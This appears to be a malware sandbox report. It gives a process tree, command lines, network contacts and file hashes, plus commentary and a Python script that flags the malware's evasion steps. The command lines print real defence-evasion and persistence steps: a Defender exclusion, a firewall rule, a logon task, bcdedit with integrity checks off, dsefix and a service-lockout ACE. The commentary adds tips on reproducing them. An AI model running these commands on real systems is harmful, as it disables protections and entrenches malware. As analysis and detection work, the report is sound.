PID 2872 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe C:\Windows\system32\WerFault.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 1952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 2040 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 2512 wrote to memory of 1960 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 808 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.0.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 308 wrote to memory of 1748 N/A C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe C:\Users\Admin\AppData\Local\Temp\u8k.1.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 1044 wrote to memory of 2028 N/A C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe C:\Windows\system32\cmd.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2028 wrote to memory of 2736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 664 wrote to memory of 2748 N/A C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2748 wrote to memory of 1832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe
PID 532 wrote to memory of 1632 N/A C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe C:\Windows\system32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe

"C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2872 -s 668

C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe

"C:\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe"

C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

"C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe"

C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe

"C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe"

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

"C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe"

C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe

"C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510082806.log C:\Windows\Logs\CBS\CbsPersist_20240510082806.cab

C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe

"C:\Users\Admin\Pictures\8ZqLGNH2YJDVFBCte8UAV3l8.exe"

C:\Users\Admin\AppData\Local\Temp\u8k.0.exe

"C:\Users\Admin\AppData\Local\Temp\u8k.0.exe"

C:\Users\Admin\AppData\Local\Temp\u8k.1.exe

"C:\Users\Admin\AppData\Local\Temp\u8k.1.exe"

C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe

"C:\Users\Admin\Pictures\wPtHZQ5vPdfaakL1wkqQ9xud.exe"

C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe

"C:\Users\Admin\Pictures\L668OyeExs0cF7hoU0qrfgo4.exe"

C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe

"C:\Users\Admin\Pictures\1zxDwRKfAb5DhSaC0THw4Vwu.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe
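
The command lines above are the defence-evasion and persistence chain in one place: a Defender exclusion for the dropper via Add-MpPreference; an inbound firewall allow rule for a csrss.exe copy living in C:\Windows\rss (the genuine csrss.exe runs only from System32); a HIGHEST run-level logon task with the same borrowed name; a second boot entry "Windows Fast Mode" with nointegritychecks 1 (driver signature enforcement off for that entry), recoveryenabled 0, timeout 0 and then made the default, followed by dsefix.exe, a publicly known DSE-bypass utility, all in service of loading the unsigned WinMon/WinMonFS rootkit driver tagged in the summary; and sc sdset on the fake WinDefender service, whose (D;;WPDT;;;BA) ACE denies SERVICE_STOP and SERVICE_PAUSE_CONTINUE to Administrators so the service cannot be stopped from an elevated prompt. Two caveats when you reproduce this: Secure Boot policy blocks changing nointegritychecks and testsigning, so the bcdedit route only works with Secure Boot off, and sc sdshow on the service is the only reliable way to see the deny ACE, since the Services console simply greys out Stop. The Python below is an added example of mine, not tooling from the sandbox or the report: it runs these checks over command lines as the report prints them, with the lines from this Processes list embedded verbatim as the sample input, and the system-directory allowlist, the borrowed-name list and the risky bcdedit settings are my own thresholds.

```python
import re
from typing import Dict, List

# SDDL rights letters as sc sdset applies them to service objects
SERVICE_RIGHTS = {
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "DC": "SERVICE_CHANGE_CONFIG", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([AD]);[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")
SYSTEM_PROCESS_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "winlogon.exe", "svchost.exe", "wininit.exe"}
# bcdedit settings that weaken boot integrity or hide a modified entry from the user
BCD_RISKY = ("nointegritychecks 1", "testsigning on", "recoveryenabled 0", "-timeout 0", "/timeout 0")


def admin_deny_rights(sddl: str) -> List[str]:
    """Rights that deny ACEs in the DACL take away from Administrators (BA) or SYSTEM (SY)."""
    dacl = sddl.split("S:", 1)[0]          # ignore the SACL, which only carries audit ACEs
    denied = []
    for ace_type, rights, sid in ACE_RE.findall(dacl):
        if ace_type == "D" and sid in ("BA", "SY"):
            denied += [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]
    return denied


def triage_command_line(cmd: str) -> List[str]:
    """Return findings for one captured command line; an empty list means nothing notable."""
    low = cmd.lower()
    findings = []
    m = re.search(r'add-mppreference.*?-exclusionpath\s+"?([^"\s]+)', cmd, re.I)
    if m:
        findings.append(f"Defender exclusion added for {m.group(1)}")
    if "advfirewall firewall add rule" in low and "action=allow" in low:
        prog = re.search(r'program="?([^"\s]+)', cmd, re.I)
        if prog:
            path = prog.group(1)
            name = path.rsplit("\\", 1)[-1].lower()
            if not path.lower().startswith(SYSTEM_DIRS):
                findings.append(f"firewall allow rule for non-system binary {path}")
            if name in SYSTEM_PROCESS_NAMES and not path.lower().startswith(SYSTEM_DIRS[0]):
                findings.append(f"{name} name borrowed outside System32: {path}")
    if "schtasks" in low and "/create" in low and "/rl highest" in low:
        task = re.search(r'/tn\s+"?([^"\s]+)', cmd, re.I)
        trigger = "at logon" if "/sc onlogon" in low else "on another trigger"
        findings.append(f"highest-privilege scheduled task {task.group(1) if task else '?'} runs {trigger}")
    if "bcdedit" in low:
        if re.search(r"[-/]create\s+\{", low):
            findings.append("new boot loader entry created")
        if re.search(r"[-/]default\s+\{", low):
            findings.append("modified boot entry made the default")
        findings += [f"boot configuration weakened: {r}" for r in BCD_RISKY if r in low]
    m = re.search(r"\bsc\s+sdset\s+(\S+)\s+(\S+)", cmd, re.I)
    if m:
        denied = admin_deny_rights(m.group(2))
        if denied:
            findings.append(f"service {m.group(1)} denies Administrators/SYSTEM: {', '.join(denied)}")
    return findings


def triage(cmds: List[str]) -> Dict[str, List[str]]:
    """Map each command line that produced findings to those findings."""
    out = {}
    for c in cmds:
        found = triage_command_line(c)
        if found:
            out[c] = found
    return out


# Sample input: command lines copied from the Processes list of this report
SAMPLE_CMDS = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\5654c63a63abcd7abe77c36cdb8c6e68379694ba69d38c0c0fed37be52c5a09f.exe" -Force',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /delete /tn ScheduledUpdate /f',
    r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -timeout 0',
    r'C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}',
    r'C:\Windows\Sysnative\bcdedit.exe /v',
    r'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    r'"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510082806.log C:\Windows\Logs\CBS\CbsPersist_20240510082806.cab',
]


def run_sample() -> Dict[str, List[str]]:
    return triage(SAMPLE_CMDS)


if __name__ == "__main__":
    for cmd, found in run_sample().items():
        print(cmd[:70] + ("..." if len(cmd) > 70 else ""))
        for f in found:
            print("   ", f)
```

On a live host the same questions are answered by bcdedit /enum all, sc sdshow WinDefender, netsh advfirewall firewall show rule name=all, schtasks /query /v /fo LIST and Get-MpPreference, and the regexes above accept their output only where it happens to echo the original command line; feed them process-creation telemetry (Sysmon event 1 or Security event 4688 with command-line auditing) to get the same findings at scale.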

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 nic-it.nl udp
RU 193.233.132.234:80 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 yip.su udp
DE 138.201.79.103:80 nic-it.nl tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 188.114.97.2:443 yip.su tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.50:80 download.iolo.net tcp
US 8.8.8.8:53 860c4dfd-593b-411f-a2f4-b05741cd854f.uuid.allstatsin.ru udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.38.228:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 server7.allstatsin.ru udp
US 8.8.8.8:53 stun.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 74.125.250.129:19302 stun.l.google.com udp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.104:443 server7.allstatsin.ru tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

memory/2872-0-0x000007FEF5C73000-0x000007FEF5C74000-memory.dmp

memory/2872-1-0x0000000001070000-0x000000000107A000-memory.dmp

memory/2872-2-0x0000000000E20000-0x0000000000E7E000-memory.dmp

memory/2872-3-0x000007FEF5C70000-0x000007FEF665C000-memory.dmp

memory/2512-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-11-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-8-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2512-7-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-6-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-5-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2512-4-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2984-18-0x000000001B740000-0x000000001BA22000-memory.dmp

memory/2984-19-0x0000000001E10000-0x0000000001E18000-memory.dmp

\Users\Admin\Pictures\bssq3gO78pqtnPrxuqbYkNPu.exe

MD5 0548c8fb97a0beb199aafecc2be8acb4
SHA1 d694cdfe61f922c4433d0549e5ff31e1c490bcab
SHA256 283a84dafeb6ce11cce61dcb92acc91f1d284aea06bf4b71024cfd1ad4f9ff46
SHA512 aa36040a2f815f2eeb65041d6a3cd3acd7c62d17f1432ae87269fbdf6162b9d72f695d86af1aba8d1223080b4b8d7deea25b423d73e5b4219bcd8111ce029cbe

C:\Users\Admin\AppData\Local\Temp\Tar5AB4.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\Cab5AB0.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
